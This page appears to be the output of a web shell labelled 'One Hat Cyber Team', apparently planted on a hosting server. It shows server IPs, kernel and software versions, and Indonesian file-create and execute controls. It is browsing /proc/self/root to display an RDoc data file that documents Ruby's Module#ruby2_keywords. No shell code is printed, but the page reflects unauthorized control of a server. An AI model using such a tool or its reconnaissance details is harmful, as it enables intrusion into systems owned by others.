⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Module
/
View File Name :
ruby2_keywords-i.ri
U:RDoc::AnyMethod[iI"ruby2_keywords:ETI"Module#ruby2_keywords;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"NFor the given method names, marks the method as passing keywords through ;TI"Ja normal argument splat. This should only be called on methods that ;TI"Laccept an argument splat (
*args
) but not explicit keywords or ;TI"Ma keyword splat. It marks the method such that if the method is called ;TI"Nwith keyword arguments, the final hash argument is marked with a special ;TI"Mflag such that if it is the final element of a normal argument splat to ;TI"Ianother method call, and that method call does not include explicit ;TI"Pkeywords or a keyword splat, the final element is interpreted as keywords. ;TI"IIn other words, keywords will be passed through the method to other ;TI" methods.;To:RDoc::Markup::BlankLine o; ; [I"LThis should only be used for methods that delegate keywords to another ;TI"Lmethod, and only for backwards compatibility with Ruby versions before ;TI" 2.7.;T@o; ; [ I"KThis method will probably be removed at some point, as it exists only ;TI"Hfor backwards compatibility. As it does not exist in Ruby versions ;TI"Nbefore 2.7, check that the module responds to this method before calling ;TI"Lit. Also, be aware that if this method is removed, the behavior of the ;TI"Bmethod will change so that it does not pass through keywords.;T@o:RDoc::Markup::Verbatim; [I"module Mod ;TI"$ def foo(meth, *args, &block) ;TI", send(:"do_#{meth}", *args, &block) ;TI" end ;TI"B ruby2_keywords(:foo) if respond_to?(:ruby2_keywords, true) ;TI"end;T:@format0: @fileI"vm_method.c;T:0@omit_headings_from_table_of_contents_below0I"0ruby2_keywords(method_name, ...) -> nil ;T0[ I"(*args);T@,FI"Module;TcRDoc::NormalClass00